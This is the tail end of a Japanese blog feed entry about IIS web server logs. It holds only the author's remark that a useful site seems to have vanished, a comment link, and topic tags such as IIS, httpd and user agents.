だったのですが、このサイトは消滅してしまったのでしょうか？ 便利だったのに……。</p><ul class="comment-link"><li><a href="../topic/519/comment">「ログの URL 末尾にスラッシュを捏造する IIS」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/IIS">IIS</a> / <a href="../genre/httpd">httpd</a> / <a href="../genre/altba.com">altba.com</a> / <a href="../genre/%E3%82%B5%E3%83%BC%E3%83%90">サーバ</a> / <a href="../genre/UA">UA</a> / <a href="../genre/dloader">dloader</a></span></p></div></div></content></entry></feed>